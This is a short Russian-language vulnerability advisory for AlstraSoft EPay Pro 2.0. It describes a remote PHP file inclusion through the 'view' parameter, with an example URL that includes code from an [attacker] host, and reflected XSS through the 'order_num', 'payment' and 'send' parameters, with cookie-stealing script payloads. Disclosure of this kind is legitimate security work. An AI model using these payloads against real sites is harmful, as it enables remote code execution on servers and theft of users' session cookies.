Программа: AlstraSoft EPay Pro 2.0
Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные команды на целевой
системе.
1. PHP-инклюдинг возможет из-за
недостаточной фильтрации данных в
параметре view сценария index.php. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
команды на системе с привилегиями web
сервера.
Пример:
http://[target]/epal/index.php?view=http://[attacker]?
2. Межсайтовый скриптинг возможен из-за
недостаточной фильтрации данных в
параметрах 'order_num' и 'send'. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
HTML сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Пример:
http://[target]/epal/?order_num=crap&payment="> <script>alert(document.cookie)</script>&send=first&
send=regular&send=priority&send=express
http://[target]/epal/?order_num=crap&payment=crap &send=first&send=regular&send=priority&send='%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E